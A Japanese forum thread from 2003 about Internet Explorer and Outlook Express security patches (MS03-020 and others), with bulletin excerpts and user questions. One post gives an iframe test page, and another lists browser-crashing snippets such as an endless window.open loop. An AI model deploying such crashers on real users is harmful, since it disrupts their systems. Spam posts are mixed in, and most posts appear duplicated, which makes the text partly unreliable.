問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
●修正プログラム
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/3/E/9/3E9E4C1B-C41F-4B24-A08B-AFE2294B499E/q818529.exe
・Internet Explorer 6 Service Pack 1 for Windows Server 2003
http://download.microsoft.com/download/1/F/D/1FD5A702-0B2C-40E0-A940-0CE3749854C2/WindowsServer2003-kb818529-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります
・Internet Explorer 6 (WU)
http://download.microsoft.com/download/9/C/B/9CB33CE6-0063-44E9-A641-9E83F5C7C0F5/q818529.exe
・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/1/C/9/1C97DB36-978A-4562-8AA3-3B49ADA6BF04/q818529.exe
・Internet Explorer 5.01 Service Pack 3 (WU)
http://download.microsoft.com/download/F/2/C/F2C1FF05-F40C-4EFC-9117-91209B807921/q818529.exe
注意:64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用を
お願いいたします。
・Windows XP Internet Explorer 6 SP1
http://download.microsoft.com/download/1/E/F/1EF8CF12-6110-494F-976B-0991BAE38A3A/q818529.exe
・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/C/5/4/C5458687-A30D-424C-BF79-5A16A57763BA/WindowsServer2003-kb818529-ia64-JPN.exe
(WU) マークの付いている修正プログラムは Windows Update から
インストールすることもできます。
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/3/E/9/3E9E4C1B-C41F-4B24-A08B-AFE2294B499E/q818529.exe
・Internet Explorer 6 Service Pack 1 for Windows Server 2003
http://download.microsoft.com/download/1/F/D/1FD5A702-0B2C-40E0-A940-0CE3749854C2/WindowsServer2003-kb818529-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります
・Internet Explorer 6 (WU)
http://download.microsoft.com/download/9/C/B/9CB33CE6-0063-44E9-A641-9E83F5C7C0F5/q818529.exe
・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/1/C/9/1C97DB36-978A-4562-8AA3-3B49ADA6BF04/q818529.exe
・Internet Explorer 5.01 Service Pack 3 (WU)
http://download.microsoft.com/download/F/2/C/F2C1FF05-F40C-4EFC-9117-91209B807921/q818529.exe
注意:64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用を
お願いいたします。
・Windows XP Internet Explorer 6 SP1
http://download.microsoft.com/download/1/E/F/1EF8CF12-6110-494F-976B-0991BAE38A3A/q818529.exe
・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/C/5/4/C5458687-A30D-424C-BF79-5A16A57763BA/WindowsServer2003-kb818529-ia64-JPN.exe
(WU) マークの付いている修正プログラムは Windows Update から
インストールすることもできます。
499 :名無しさん@お腹いっぱい。:03/06/05 13:16
>>497-498
IEに2種類の危険なセキュリティ・ホール,任意のプログラムを実行させられる
マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/1/
今回公開されたセキュリティ・ホールは以下の2種類。
(1)Objectタグの処理に関するセキュリティ・ホール
(2)ファイルのダウンロード・ダイアログに関するセキュリティ・ホール
IEに2種類の危険なセキュリティ・ホール,任意のプログラムを実行させられる
マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/1/
今回公開されたセキュリティ・ホールは以下の2種類。
(1)Objectタグの処理に関するセキュリティ・ホール
(2)ファイルのダウンロード・ダイアログに関するセキュリティ・ホール
500 :名無しさん@お腹いっぱい。:03/06/05 13:37
新たに2つ「緊急」の脆弱性、MSがIE用の累積パッチを公開
マイクロソフトは6月5日、Internet Explorer 6/5.5/5.01用の新たな累積パッチ(MS03-020)を公開した。
http://www.zdnet.co.jp/enterprise/0306/05/epn02.html
マイクロソフトは6月5日、Internet Explorer 6/5.5/5.01用の新たな累積パッチ(MS03-020)を公開した。
http://www.zdnet.co.jp/enterprise/0306/05/epn02.html
501 :名無しさん@お腹いっぱい。:03/06/05 15:01
>>498 って >>455の
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"
のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?
>>453 のゾーン無視の方はどうなってるのだろ。。。
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"
のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?
>>453 のゾーン無視の方はどうなってるのだろ。。。
502 :名無しさん@お腹いっぱい。:03/06/05 15:35
私も便乗でお尋ねしたいのですが、
>>453の「ゾーン無視」や
>>455の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?
>>453の「ゾーン無視」や
>>455の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?
503 :名無しさん@お腹いっぱい。:03/06/05 15:41
>>501, >>501
スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。
スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。
504 :名無しさん@お腹いっぱい。:03/06/05 15:47
>>503
さんきゅです
さんきゅです
505 :名無しさん@お腹いっぱい。:03/06/05 16:14
>>502
どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ
どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ
506 :名無しさん@お腹いっぱい。:03/06/05 16:22
>>505
ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。
ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。
507 :名無しさん@お腹いっぱい。:03/06/05 16:23
あ! マイコンピューターもちゃんと視野に入ってるのね >>502
>>507
そうでぃ〜す! いずれにしても、レスありがとうございます。
まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って>>459のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。
そうでぃ〜す! いずれにしても、レスありがとうございます。
まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って>>459のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。
509 :名無しさん@お腹いっぱい。:03/06/05 16:42
>>508
↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502の設定じゃ出てくるから負け。
<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>
↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502の設定じゃ出てくるから負け。
<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>
511 :名無しさん@お腹いっぱい。:03/06/05 23:34
「ファイル交換ソフトで感染を広げるウイルスの届け出数が急増中」――IPA
ブラウザ・クラッシャによる被害も増加中,設定変更やIE以外のブラウザの使用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/2/
コンピュータウイルスの届出状況について
http://www.ipa.go.jp/security/txt/2003/06.html
ブラウザ・クラッシャによる被害も増加中,設定変更やIE以外のブラウザの使用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/2/
コンピュータウイルスの届出状況について
http://www.ipa.go.jp/security/txt/2003/06.html
512 :名無しさん@お腹いっぱい。:03/06/06 10:39
メール機能を悪用する主なウイルス一覧
情報処理振興事業協会セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/mail_aware.html
最終更新日:2003年 6月 5日
情報処理振興事業協会セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/mail_aware.html
最終更新日:2003年 6月 5日
513 :名無しさん@お腹いっぱい。:03/06/07 00:27
age
514 :名無しさん@お腹いっぱい。:03/06/09 22:49
age
515 :とも:03/06/09 22:51
516 :名無しさん@お腹いっぱい。:03/06/10 12:42
517 :名無しさん@お腹いっぱい。:03/06/10 14:16
【川崎憲次郎投手をオールスターに!】
ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/
6月10日時点の選手別投票数http://allstar.sanyo.co.jp/result/detail.html
ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/
6月10日時点の選手別投票数http://allstar.sanyo.co.jp/result/detail.html
518 :名無しさん@お腹いっぱい。:03/06/15 23:10
セキュリティ・ホールを修正した「Opera7.11 for Windows 日本語版」が公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030612/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030612/1/
519 :名無しさん@お腹いっぱい。:03/06/16 11:12
>>518
スレ違いだろ。
スレ違いだろ。
520 :名無しさん@お腹いっぱい。:03/06/17 01:59
MS03-020って烈しく無意味なのですが・・
http://www.malware.com/forceframe.html
http://www.malware.com/forceframe.html
521 :名無しさん@お腹いっぱい。:03/06/17 02:09
522 :名無しさん@お腹いっぱい。:03/06/17 09:34
523 :名無しさん@お腹いっぱい。:03/06/17 10:17
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!!
524 :名無しさん@お腹いっぱい。:03/06/17 10:49
>>520
任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。
大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。
任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。
大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。
525 :名無しさん@お腹いっぱい。 :03/06/17 13:19
ウインドーズ98は、もう更新できないのでしょうか?
更新しようとしても、98についの説明がありません。
それと、インテリマウスがしょっちゅう自動的にクリック
するようになってしまうのはブリクラと関係があるのでしょうか?
壊れ始めているよ〜だ! SOS, SOS, , ,
更新しようとしても、98についの説明がありません。
それと、インテリマウスがしょっちゅう自動的にクリック
するようになってしまうのはブリクラと関係があるのでしょうか?
壊れ始めているよ〜だ! SOS, SOS, , ,
526 :名無しさん@お腹いっぱい。:03/06/17 13:29
527 :名無しさん@お腹いっぱい。:03/06/17 13:40
おっ、Piggybackで止まった
529 :名無しさん@お腹いっぱい。:03/06/17 16:12
530 :名無しさん@お腹いっぱい。:03/06/17 17:52
直リンもやめるべきだろう。
>>520のメール欄を見る限りは確信犯。
>>520のメール欄を見る限りは確信犯。
531 :名無しさん@お腹いっぱい。:03/06/17 23:34
age
532 :名無しさん@お腹いっぱい。:03/06/18 09:59
IEの新しい累積パッチにはいくつかの注意点,既に適用したユーザーも再確認を
既知のホールを解消できるものの不完全,ブラウザ・クラッシャは回避できない
今週のSecurity Check [Windows編] (第97回,2003年6月18日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/
既知のホールを解消できるものの不完全,ブラウザ・クラッシャは回避できない
今週のSecurity Check [Windows編] (第97回,2003年6月18日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/
533 :名無しさん@お腹いっぱい。:03/06/18 21:14
Microsoft的にはブラクラは優先的に対処すべきセキュリティホール
として扱われていないから仕方ないだろ
while (1) { window.open() }とか
<img src="mailto:sage">…(えんえんと続く)とか
<input type>とか
http://msgs.securepoint.com/cgi-bin/get/bugtraq0303/107.html とか
単にブラウザが落ちるだけのものならいくらでもある
として扱われていないから仕方ないだろ
while (1) { window.open() }とか
<img src="mailto:sage">…(えんえんと続く)とか
<input type>とか
http://msgs.securepoint.com/cgi-bin/get/bugtraq0303/107.html とか
単にブラウザが落ちるだけのものならいくらでもある
534 :名無しさん@お腹いっぱい。:03/06/19 00:16
あげ
535 :n:03/06/19 00:21
☆頑張ってまーす!!☆
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
536 :名無しさん@お腹いっぱい。:03/06/19 14:07
537 :名無しさん@お腹いっぱい。:03/06/19 21:34
>>526
どうもありがとう。行って来ました。
どうもありがとう。行って来ました。
538 :名無しさん@お腹いっぱい。:03/06/19 22:13
Win2k/XPなら制限付きユーザーでブラウズすると、
IEが危険とされる理由のひとつである、「勝手にバイナリを
ダウンロードして実行したりインストールしたりする機能」が
署名の有無やゾーンにかかわらず完全に無効になるから
かなり安全になる。
IEが危険とされる理由のひとつである、「勝手にバイナリを
ダウンロードして実行したりインストールしたりする機能」が
署名の有無やゾーンにかかわらず完全に無効になるから
かなり安全になる。
539 :名無しさん@お腹いっぱい。:03/06/20 00:30
age
540 :名無しさん@お腹いっぱい。:03/06/22 20:27
あげ
541 :名無しさん@お腹いっぱい。:03/06/23 01:32
_, ._
( ゚ Д゚)
( つ O ガシャ
と_)_) __
(__()、;.o:。
゚*・:.。
( ゚ Д゚)
( つ O ガシャ
と_)_) __
(__()、;.o:。
゚*・:.。
542 :名無しさん@お腹いっぱい。:03/06/25 19:27
age
543 :名無しさん@お腹いっぱい。:03/06/26 05:09
IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp
●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp
●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP
544 :名無しさん@お腹いっぱい。:03/06/26 23:24
IEブラウザに新たな欠陥:米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm
545 :IE5.5SP2日本語版:03/06/27 00:44
IE5.5SP2のダウンロードは終了したはずだが、
Internet Explorer 5.5 SP2 ダウンロード提供終了のご案内
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
なぜかダウンロードが復活しているので、必要な方はいまのうちにどうぞ。
http://www.microsoft.com/downloads/details.aspx?FamilyID=0a50996b-deb9-4a46-81da-abef1ebbd08a&DisplayLang=ja
Internet Explorer 5.5 SP2 ダウンロード提供終了のご案内
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
なぜかダウンロードが復活しているので、必要な方はいまのうちにどうぞ。
http://www.microsoft.com/downloads/details.aspx?FamilyID=0a50996b-deb9-4a46-81da-abef1ebbd08a&DisplayLang=ja
546 :名無しさん@お腹いっぱい。:03/06/27 01:23
>>545
ODNのCD-ROMを店からもらってきた方が後々いいかもしれない
ODNのCD-ROMを店からもらってきた方が後々いいかもしれない
547 :名無しさん@お腹いっぱい。:03/06/27 07:35
>>545
Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが
Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが
548 :名無しさん@お腹いっぱい。:03/06/27 12:30
http://www.zdnet.co.jp/news/0306/27/nebt_18.html
判決出た。搭載命令は撤回
判決出た。搭載命令は撤回
549 :名無しさん@お腹いっぱい。:03/06/27 13:30
米Sunと米MSのJava訴訟,Java搭載の仮命令は差し戻し
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030627/6/
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030627/6/
550 :名無しさん@お腹いっぱい。:03/06/27 17:19
551 :名無しさん@お腹いっぱい。:03/06/27 17:44
>>550
そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…
そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…
552 :名無しさん@お腹いっぱい。:03/06/28 00:37
>>551
駅に置いてあるやつでいいの?
駅に置いてあるやつでいいの?
553 :名無しさん@お腹いっぱい。 :03/06/28 19:39
WIN98だが、もうすぐアップデートできなくなるらしい。
DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための
更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の
もの)、ダウンロードしておいたほうが良い?
ダウンロードしてなにか問題がなかったでしょうか? あったような?
DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための
更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の
もの)、ダウンロードしておいたほうが良い?
ダウンロードしてなにか問題がなかったでしょうか? あったような?
554 :名無しさん@お腹いっぱい。:03/06/28 19:52
>>553
( ゚д゚)ポカーン
( ゚д゚)ポカーン
555 :名無しさん@お腹いっぱい。:03/06/28 20:00
私のところにメールが頻繁に届きます。
本当に簡単な仕事ですか?と聞かれますので
答えました。簡単なビジネスです。1日の労働時間は
2時間です。皆さんは0円から行い、
最終的に年商3000万円を目指してください。
ちゃんと教えます。稼ぎ方をおしえますので安心してください。
http://www.c-gmf.com/farewell/box08.htm
本当に簡単な仕事ですか?と聞かれますので
答えました。簡単なビジネスです。1日の労働時間は
2時間です。皆さんは0円から行い、
最終的に年商3000万円を目指してください。
ちゃんと教えます。稼ぎ方をおしえますので安心してください。
http://www.c-gmf.com/farewell/box08.htm
556 :名無しさん@お腹いっぱい。:03/06/29 00:58
557 :名無しさん@お腹いっぱい。:03/07/02 11:22
EdMax, WeMail32など複数のWindowsメーラにセキュリティホール
http://slashdot.jp/security/
[memo:6145] 複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://memo.st.ryukoku.ac.jp/archive/200307.month/6145.html
http://slashdot.jp/security/
[memo:6145] 複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://memo.st.ryukoku.ac.jp/archive/200307.month/6145.html
558 :名無しさん@お腹いっぱい。:03/07/04 00:37
OEを糞といってた諸君、一言どうぞ。
559 :名無しさん@お腹いっぱい。:03/07/04 06:15
Outlook Express6SP1を使っています。
ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。
いままで一度も出たことがありません。
このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。
Outlook Expressのフォルダは別ドライブに移動してありますが、
移動後もこれまではうまく動いたと記憶しています。
環境はxpsp1
関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。
ちょっと気持ちが悪いので情報提供方よろしくお願いします。
---------------------------
Outlook Express
---------------------------
Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。
---------------------------
OK キャンセル
---------------------------
ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。
いままで一度も出たことがありません。
このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。
Outlook Expressのフォルダは別ドライブに移動してありますが、
移動後もこれまではうまく動いたと記憶しています。
環境はxpsp1
関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。
ちょっと気持ちが悪いので情報提供方よろしくお願いします。
---------------------------
Outlook Express
---------------------------
Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。
---------------------------
OK キャンセル
---------------------------
560 :559:03/07/04 06:19
追加です。
アプリとしては上記のほか、
SpywareBlaster(スパイウエアブラスター)でオールチェック
Spybot(スパイボット)で免疫化適用
AdAware(アドアウエア)で定期チェック です。
よろしくお願いします。
アプリとしては上記のほか、
SpywareBlaster(スパイウエアブラスター)でオールチェック
Spybot(スパイボット)で免疫化適用
AdAware(アドアウエア)で定期チェック です。
よろしくお願いします。
561 :名無しさん@お腹いっぱい。:03/07/04 18:15
>>558
HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。
HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。
562 :名無しさん@お腹いっぱい。:03/07/04 19:30
↑
(;´Д`)
(;´Д`)
563 :名無しさん@お腹いっぱい。:03/07/04 22:28
>>559
最適化中に送受信が入るとそのメッセージが出る。
最適化中に送受信が入るとそのメッセージが出る。
564 :名無しさん@お腹いっぱい。:03/07/05 00:11
>>563
やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。
やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。
566 :名無しさん@お腹いっぱい。:03/07/05 18:54
567 :名無しさん@お腹いっぱい。:03/07/08 00:33
>>557対応状況
Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
ドラえもんメールアップデートモジュール公開のお知らせ
http://www.doraemon-mail.com/support/update.html
WeMail32 Ver.2.10beta1をリリースしました
http://www.ntes.co.jp/WeMail/whatsnew.html
EdMax更新履歴
http://www.edcom.jp/edmdes1.html
EdMaxフリー版更新履歴
http://www.edcom.jp/edmfree.html
Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
ドラえもんメールアップデートモジュール公開のお知らせ
http://www.doraemon-mail.com/support/update.html
WeMail32 Ver.2.10beta1をリリースしました
http://www.ntes.co.jp/WeMail/whatsnew.html
EdMax更新履歴
http://www.edcom.jp/edmdes1.html
EdMaxフリー版更新履歴
http://www.edcom.jp/edmfree.html
568 :名無しさん@お腹いっぱい。:03/07/08 00:57
問題点は、OEは対策されるまで公表されない場合が多い。
他のメーラはOEで公表後、後追いでの対策になる。
他のメーラはOEで公表後、後追いでの対策になる。
569 :名無しさん@お腹いっぱい。:03/07/08 10:03
> OEは対策されるまで公表されない場合が多い。
あたりまえだろ、対策前に公表されたらアタックされるぞ
あたりまえだろ、対策前に公表されたらアタックされるぞ
570 :名無しさん@お腹いっぱい。:03/07/08 10:05
まぁ、公表されても見ないあほが多いけどな。
571 :名無しさん@お腹いっぱい。:03/07/08 11:44
[Full-Disclosure] Internet Explorer 6 DoS Bug
http://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030708_aux
http://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030708_aux
572 :名無しさん@お腹いっぱい。:03/07/08 13:47
573 :(;´Д`):03/07/08 14:33
(;´Д`)感動した
http://homepage3.nifty.com/coco-nut/
http://homepage3.nifty.com/coco-nut/
574 :名無しさん@お腹いっぱい。:03/07/08 21:49
>>571-572
Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html
Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html
575 :名無しさん@お腹いっぱい。:03/07/10 15:52
Windowsに3種類の深刻なセキュリティ・ホール,すべてのユーザーが対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/
(1)HTML コンバータのバッファ オーバーランにより,コードが実行される(823559)(MS03-023)
(2)Windows のバッファ オーバーランによりデータが破損する(817606)(MS03-024)
(3)ユーティリティ マネージャによる Windows メッセージ処理の問題により,権限が昇格する(822679)(MS03-025)
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/
(1)HTML コンバータのバッファ オーバーランにより,コードが実行される(823559)(MS03-023)
(2)Windows のバッファ オーバーランによりデータが破損する(817606)(MS03-024)
(3)ユーティリティ マネージャによる Windows メッセージ処理の問題により,権限が昇格する(822679)(MS03-025)
577 :あい:03/07/10 20:31
578 :名無しさん@お腹いっぱい。:03/07/10 23:57
579 :名無しさん@お腹いっぱい。:03/07/11 15:12
WebブラウザOperaにサービス拒否攻撃を受ける新しい弱点
http://itpro.nikkeibp.co.jp/free/NT/WinSecurity/20030710/1/
http://itpro.nikkeibp.co.jp/free/NT/WinSecurity/20030710/1/
580 :名無しさん@お腹いっぱい。:03/07/11 16:28
>>579
関係ないだろ、スレのタイトル読めない?
関係ないだろ、スレのタイトル読めない?
581 :名無しさん@お腹いっぱい。:03/07/11 21:10
>580
脳みそがクラックされてるから仕方ない
脳みそがクラックされてるから仕方ない
582 :名無しさん@お腹いっぱい。:03/07/11 21:35
HTML コンバータのバッファ オーバーランにより、コードが実行される
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
厳密にはIEやOEのセキュリティホールではないが、
喰らうタイミングがIEでWebページを見たときやOEでHTMLメールを
開いたときだから貼っとく。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
厳密にはIEやOEのセキュリティホールではないが、
喰らうタイミングがIEでWebページを見たときやOEでHTMLメールを
開いたときだから貼っとく。
583 :名無しさん@お腹いっぱい。:03/07/12 17:41
>>579-581
IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。
IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。
584 :名無しさん@お腹いっぱい。:03/07/13 00:36
>>582はたぶんalign buffer overflowの修正だ。
http://www.pivx.com/larholm/unpatched/
「スクリプトによる貼り付け処理」を無効にすることで回避できるって書いてるし
http://www.pivx.com/larholm/unpatched/
「スクリプトによる貼り付け処理」を無効にすることで回避できるって書いてるし
585 :名無しさん@お腹いっぱい。:03/07/14 00:51
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
587 :名無しさん@お腹いっぱい。:03/07/15 15:29
保守
588 :名無しさん@お腹いっぱい。:03/07/15 17:02
589 :名無しさん@お腹いっぱい。:03/07/15 17:10
1 July 2003: There are currently 19 unpatched vulnerabilities.
http://www.pivx.com/larholm/unpatched/
http://www.pivx.com/larholm/unpatched/
590 :名無しさん@お腹いっぱい。:03/07/15 17:12
↑Unpatched IE security holes
591 :名無しさん@お腹いっぱい。:03/07/15 21:04
いつのまに"IE/OE使う人のためのスレ"になったんだ…
593 :名無しさん@お腹いっぱい。:03/07/15 23:39
594 :名無しさん@お腹いっぱい。:03/07/16 00:08
セキュリティパッチ情報集積所でも立てるか
595 :名無しさん@お腹いっぱい。:03/07/16 23:43
漏れも全部一緒のほうがありがたい
596 :名無しさん@お腹いっぱい。:03/07/18 14:30
http://www.microsoft.com/japan/technet/security/fixedhome.asp
しかし、わかりにくいところにあるなw
しかし、わかりにくいところにあるなw
597 :名無しさん@お腹いっぱい。:03/07/24 18:47
「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される(819696)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-030ov.asp
598 :???:03/07/24 18:48
